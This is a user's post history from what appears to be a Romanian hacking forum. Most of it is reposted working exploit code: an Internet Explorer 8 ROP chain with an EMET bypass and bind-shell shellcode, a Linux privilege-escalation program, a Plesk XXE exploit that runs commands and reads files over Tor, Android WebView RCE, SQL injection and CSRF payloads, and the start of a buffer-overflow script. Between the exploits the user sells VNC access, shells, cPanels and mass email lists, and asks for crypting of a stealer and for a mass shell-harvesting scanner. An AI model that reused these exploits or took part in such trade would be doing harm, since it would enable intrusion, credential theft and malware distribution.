Jump to content

sensi

Active Members
  • Posts

    574
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by sensi

  1. Daca stiam ca esti gunoiul (carderul) la care i-am returnat cei $50 nici nu mai complicam cu tine. Cum sa generez 500k mailuri ma copac? Cand ai intrat cu tv si ai vazut mailurile erau ok, nu? Acum ca nu ai prins nimic prin promovarea "" site-ului (sa nu-i zic scam) ai venit sa faci pe prostu? Cand ajung acasa incercam sa rezolvam problema, dar cam dificil cu tine. Oricum banii nu-i mai am , so, nu te gandi la returnare ( ca data trecuta). Scuzati eventualele greseli gramaticale, cam nasol de pe tel si baterua-i moarta.
  2. @marius4fun25, nu folosesc IQC, ti-am dat pm cu jabber. -- Up!
  3. <!-- .:: Remote code execution vulnerability in Boat Browser ::. credit: c0otlass social contact: https://twitter.com/c0otlass mail: c0otlass@gmail.com CVE reserved : 2014-4968 time of discovery: July 14, 2014 Browser Official site:http://www.boatmob.com/ Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en version Affected : In 8.0 and 8.0.1 tested , Android 3.0 through 4.1.x Risk rate: High vulnerability Description impact: The WebView class and use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device a related issue to CVE-2012-6636 proof of concept: //..............................................poc.hmtl............................................ --> <!DOCTYPE html> <html> <head> <meta charset="UFT-8"> <title>CreatMalTxt POC - WebView</title> <script> var obj; function TestVulnerability() { temp="not"; var myObject = window; for (var name in myObject) { if (myObject.hasOwnProperty(name)) { try { temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null); } catch(e) { } } } if(temp=="not") { document.getElementById("log").innerHTML="this browser has been patched"; } else{ document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ; document.getElementById("log").innerHTML += "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']); } } </script> </head> <body > <h3>CreatMalTxt POC</h3> <input value="Test Vulnerability" type="button" onclick="TestVulnerability();" /> <div id="log"></div> </body> </html> <!-- Solution: https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/ http://www.programering.com/a/MDM3YzMwATc.html https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614 References: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/ https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/ http://50.56.33.56/blog/?p=314 https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/ https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py --> source
  4. Chiar daca cei de la vbulletin nu merita raportul, trebuie apreciat gestul tau. Felicitari! // Cat a timp durat pana ai gasit 0day-ul? Plt, nu ai zis nimanui ca mai e vbulletin 5 pe server, ne bagam si noi.
  5. Salut, caut ceva (shell scanner/exploit/crawler) cu care pot face rost de shell-uri, aici ma refer la o "cantitate" mai mare. Ma gandeam la un script care gaseste site-uri vulnerabile SQLi prin dork-uri si sa urce shell prin f. into outfile, sau o alta metoda mai ingenioasa ca sa zic asa. Stiu ca pentru wordpress (o versiune mai veche) exista un exploit. Cei care detin un astfel de "scanner" sau cum vreti voi sa-l numiti, rog sa ma contacteze cu un ID si suma stabilita.
  6. <!-- ** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass ** Offensive Security Research Team ** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet ** Affected Software: Internet Explorer 8 ** Vulnerability: Fixed Col Span ID ** CVE: CVE-2012-1876 ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X --> <html> <body> <div id="evil"></div> <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table> <script language='javascript'> function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } var free = "EEEE"; while ( free.length < 500 ) free += free; var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1; var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2; var fr = new Array(); var al = new Array(); var bl = new Array(); var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage(); } function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2228408; // POP ECX var rop = rop.toString(16); var rop25 = rop.substring(4,8); var rop26 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1586172; // POP EAX var rop = rop.toString(16); var rop27 = rop.substring(4,8); var rop28 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] var rop = rop.toString(16); var rop29 = rop.substring(4,8); var rop30 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1884912; // PUSH EAX var rop = rop.toString(16); var rop31 = rop.substring(4,8); var rop32 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2140694; // ADD EAX,ECX var rop = rop.toString(16); var rop33 = rop.substring(4,8); var rop34 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX var rop = rop.toString(16); var rop35 = rop.substring(4,8); var rop36 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5036248; // ADD ESP,0C var rop = rop.toString(16); var rop37 = rop.substring(4,8); var rop38 = rop.substring(0,4); // } RET var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW var getmodulew = getmodulew.toString(16); var getmodulew1 = getmodulew.substring(4,8); var getmodulew2 = getmodulew.substring(0,4); // } RET var getprocaddr = cbuttonlayout + 4836; // GetProcAddress var getprocaddr = getprocaddr.toString(16); var getprocaddr1 = getprocaddr.substring(4,8); var getprocaddr2 = getprocaddr.substring(0,4); // } RET var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141"); // PADDING shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN // EMET disable part 0x01 // Implement the Tachyon detection grid to overcome the Romulan cloaking device. shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u101C%u076d"); // EMET string shellcode+= unescape("%ue220%u0007"); // EMET offset shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0000%u0000"); // Zero out ECX shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN shellcode+= "EMET"; // EMET string shellcode+= unescape("%u0000%u0000"); // EMET string // EMET disable part 0x01 end // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 // Execute the Corbomite bluff to disarm EAF shellcode+= unescape("%uc0b8%u6d10"); shellcode+= unescape("%u8b07%u8b00"); shellcode+= unescape("%u6800%u10c8"); shellcode+= unescape("%u076d%ud0ff"); shellcode+= unescape("%ud468%u6d10"); shellcode+= unescape("%u5007%uc4b8"); shellcode+= unescape("%u6d10%u8b07"); shellcode+= unescape("%u8b00%uff00"); shellcode+= unescape("%u8bd0%u81f0"); shellcode+= unescape("%uccec%u0002"); shellcode+= unescape("%uc700%u2404"); shellcode+= unescape("%u0010%u0001"); shellcode+= unescape("%ufc8b%uccb9"); shellcode+= unescape("%u0002%u8300"); shellcode+= unescape("%u04c7%ue983"); shellcode+= unescape("%u3304%uf3c0"); shellcode+= unescape("%u54aa%ufe6a"); shellcode+= unescape("%ud6ff%u9090"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u29eb"); // NOPs shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress shellcode+= "NTDLL"; shellcode+= unescape("%u0000"); shellcode+= unescape("%u744e%u6553"); // NtSetContextThread shellcode+= unescape("%u4374%u6e6f"); shellcode+= unescape("%u6574%u7478"); shellcode+= unescape("%u6854%u6572"); shellcode+= unescape("%u6461%u0000"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 end // Bind shellcode on 4444 // msf > generate -t js_le // windows/shell_bind_tcp - 342 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= // I would keep the shellcode the same size for better reliability shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); // Total spray should be 1000 var padding = unescape("%u9090"); while (padding.length < 1000) padding = padding + padding; var padding = padding.substr(0, 1000 - shellcode.length); shellcode+= padding; while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; } function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; var hex = str_addr.toString(16); //alert(hex); setTimeout(function(){heapspray(str_addr)}, 50); } function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1245880"; evil_col.span = "44"; } setTimeout(function(){leak()}, 400); setTimeout(function(){get_leak()},450); setTimeout(function(){trigger_overflow()}, 700); </script> </body> </html> source // Da ai dreptate, nu vazusem... defapt nici titlul nu-i chiar sugestiv. Rog un moderator sa mute/stearga topicul.
  7. UP! $456.34 (0.78026254) btc -> PP/transfer bancar.
  8. Vand 1,130.64 RON (0.61728395) Bitcoin, transfer bancar sau PP.
  9. Ii "corupta" arhiva. // nu vazusem, sorry.
  10. Salut, mai ofera careva servicii de "crypting"? Vreau sa-mi cryptez un stealer FUD, sa tina macar 3 zile. Care ma poate ajuta, rog sa ma contacteze pe PM.
  11. Intretinerea si dezvoltarea forum-ului. Subiectul asta a mai fost abordat... // am scris odata cu alexandruth
  12. # EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability # DATE:21st June,2014 # Author:Avinash Kumar Thapa #URL: localhost/wordpress/ #PATCH/FIX:Not fixed yet. ################################################################################################### Technical Details: This is the new version released by Wordpress. version is 3.9.1(Latest) ##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php## ##################################################################################################### Exploit Code: <html> <!-- CSRF PoC - generated by **Avinash Kumar Thapa** --> <body> <form action="http://localhost/wordpress/wp-comments-post.php" method="POST"> <input type="hidden" name="author" value="Anonymous" /> <input type="hidden" name="email" value="helloworld@outlook.com" /> <input type="hidden" name="url" value="www.random.com" /> <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" /> <input type="hidden" name="submit" value="Post Comment" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="comment_parent" value="0" /> <input type="submit" value="Submit form" /> </form> </body> </html> ########################################################################################################### ---- -- Avinash a.k.a **SPID3R** twitter: @m_avinash143<https://twitter.com/m_avinash143> source
  13. #!/bin/bash # Written and discovered by Yuval tisf Nativ # The page 'dhcpinfo.html' will list all machines connected to the network with hostname, # IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname. # Checks if you are root if [ "$(id -u)" != "0" ]; then echo "Please execute this script as root" exit 1 fi # You're XSS here xss = "\"<script>alert('pwned');</script>" # backup current hostname currhost = `hostname` # Bannering echo "" echo " D-Link Persistent XSS by tisf" echo "" echo "The page dhcpinfo.html is the vulnerable page." echo "Ask the user to access it and your persistent XSS will be triggered." echo "" # Change hostname to XSS sudo hosname $xss # Restore previous hostname on exit pause "Type any key to exit and restore your previous hostname." sudo hostname $currhost source
  14. /** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://hashcrack.org * * Usage: ./poc [file_path] * * where file_path is the file on which you want to set the sgid bit */ #define _GNU_SOURCE #include <sys/wait.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <limits.h> #include <string.h> #include <assert.h> #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; struct args { int pipe_fd[2]; char *file_path; }; static int child(void *arg) { struct args *f_args = (struct args *)arg; char c; // close stdout close(f_args->pipe_fd[1]); assert(read(f_args->pipe_fd[0], &c, 1) == 0); // set the setgid bit chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); return 0; } int main(int argc, char *argv[]) { int fd; pid_t pid; char mapping[1024]; char map_file[PATH_MAX]; struct args f_args; assert(argc == 2); f_args.file_path = argv[1]; // create a pipe for synching the child and parent assert(pipe(f_args.pipe_fd) != -1); pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); assert(pid != -1); // get the current uid outside the namespace snprintf(mapping, 1024, "0 %d 1\n", getuid()); // update uid and gid maps in the child snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); fd = open(map_file, O_RDWR); assert(fd != -1); assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); close(f_args.pipe_fd[1]); assert (waitpid(pid, NULL, 0) != -1); } source
  15. Advisory ID: HTB23213 Product: web2Project Vendor: http://web2project.net Vulnerable Version(s): 3.1 and probably prior Tested Version: 3.1 Advisory Publication: April 30, 2014 [without technical details] Vendor Notification: April 30, 2014 Vendor Patch: May 1, 2014 Public Disclosure: June 18, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-3119 Risk Level: High CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web2Project, which can be exploited to perform SQL Injection attacks and gain complete access to vulnerable website. 1) SQL Injection in web2Project: CVE-2014-3119 1.1 The vulnerability exists due to insufficient sanitization of the "search_string" HTTP POST parameter passed to "/index.php" script. A remote authenticated user with privileges to access "contacts" module can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website. The following exploitation example displays version of the MySQL Server: <form action="http://[host]/index.php?m=contacts" method="post" name="main"> <input type="hidden" name="search_string" value="'and(select 1 from(select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'"> <input type="submit" id="btn"> </form> 1.2 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP POST parameter passed to "/do_updatecontact.php". This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website. The following exploitation example writes the word "immuniweb" into file "file.txt", depending on MySQL configuration and filesystem permissions: <form action="http://[host]/do_updatecontact.php" method="post" name="main"> <input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- "> <input type="submit" id="btn"> </form> 1.3 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP GET parameter passed to "/updatecontact.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website. The following exploitation example writes the word "immuniweb" info file "file.txt", depending on MySQL configuration and filesystem permissions: <form action="http://[host]/updatecontact.php" method="get" name="main"> <input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- "> <input type="submit" id="btn"> </form> Successful exploitation of the vulnerabilities can grant an attacker unrestricted access to the website and its database. ----------------------------------------------------------------------------------------------- Solution: Apply vendor fixes: https://github.com/web2project/web2project/commit/eead99b36f62a8222d9f3a913f1a2268200687ef https://github.com/web2project/web2project/commit/ab5ba92a6aaf0435cd0b2132cf7f9b7b41575a28 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23213 - https://www.htbridge.com/advisory/HTB23213 - Multiple SQL Injection Vulnerabilities in web2Project. [2] web2Project - http://web2project.net/ - web2Project is a Free Open Source business-oriented Project Management System (PMS) built for the future. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. source
  16. Momentan nu am, in cazul in care voi face rost, am sa te anunt. -- cPanels/Shells/Mails
  17. VNC-uri - 1$ / buc (la comenzi mai mari, se poate negocia) -- + 500k mails (Yahoo, Hotmail, Aol, Gmail)
  18. # Exploit Title: Plesk SSO XXE injection (Old bug) Exploit # # Date: 12 06 2014 # # Exploit Author: z00 # # Software Link: http://www.parallels.com/ # # Version: 11.0.9 10.4.4 # # Tested on: linux all # <?php /* ???????????????????????????? ?______¶¶¶¶¶¶______________? ?____¶¶¶¶¶¶¶¶¶¶____________? ?___¶¶¶¶¶¶¶¶¶¶¶¶¶__________? ?__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________? ?_¶¶¶¶¶¶¶______¶¶¶_________? ?_¶¶¶¶¶¶________¶¶__¶¶_____? ?_¶¶¶¶¶¶____________¶¶¶____? ?_¶¶¶¶¶_____________¶¶¶¶¶¶_? ?_¶¶¶¶¶____________¶¶¶¶¶¶¶_? ?_¶¶¶¶¶___________¶¶¶¶¶¶¶__? ?_¶¶¶¶¶____________¶¶¶¶¶¶__? ?_¶¶¶¶¶_____________¶¶¶¶¶¶_? ?_¶¶¶¶¶¶____________¶¶¶_¶¶_? ?__¶¶¶¶¶¶______¶¶___¶¶_____? ?__¶¶¶¶¶¶¶____¶¶¶__________? ?___¶¶¶¶¶¶¶¶¶¶¶¶___________? ?____¶¶¶¶¶¶¶¶¶¶____________? ?_____¶¶¶¶¶¶¶______________? ???????????????????????????? Plesk SSO XXE injection (Old bug) Exploit Coded by z00 (electrocode) Twitter: electrocode Not: Tor kurulu de?ilse proxy kismini kaldirin Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss Tüm ?slam Aleminin Beraat gecesi mubarek olsun dua edin:) */ function Gonder($domain,$komut,$method){ switch($method) { case "cmd": $komut = "expect://$komut"; break; case "read": $komut = "file://$komut"; break; default: $komut = "file://$komut"; } $adres = "https://$domain:8443/relay"; $paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] > <samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> <ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> <ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>"; $exploit = urlencode(base64_encode($paket)); $relaystate = gethostbyname($domain); $relayadres = urlencode(base64_encode($relaystate)); $postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$adres); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13'); curl_setopt($ch, CURLOPT_REFERER,$adres); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); //Proxy curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050"); curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); //Proxy end curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $sonuc = curl_exec ($ch); curl_close ($ch); $gelenpaket = //"Paket: " . $postlar . "Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n"; return $gelenpaket; } if($argc < 4){ $kullanim = "########################################################################\n"; $kullanim .= "Plesk XXE Exploit Tool by z00\n"; $kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read \n"; $kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n"; $kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur) \n"; $kullanim .= "########################################################################\r\n"; echo $kullanim; } else { $domain = $argv[1]; $komut = $argv[2]; $method = $argv[3]; echo Gonder($domain,$komut,$method); } ?> source
  19. #!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.3 - USERID Remote Buffer Overflow (ROP) # Version: 5.3 # Date: 2014-05-31 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.efssoft.com/ # Tested on: WinXP-GER, Win7x64-GER, Win8-EN, Win8x64-GER # # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) # # Howto / Notes: # This scripts exploits the buffer overflow vulnerability caused by an oversized UserID - string as # discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not # brute force the address of the overwritten stackpart, instead it uses code from its own # .text segment to achieve reliable code execution. from struct import pack import socket,sys import os host="192.168.0.1" port=80 junk0 = "\x90" * 80 # Instead of bruteforcing the stack address, let's take an address # from the .text segment, which is near to the stackpivot instruction: # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN 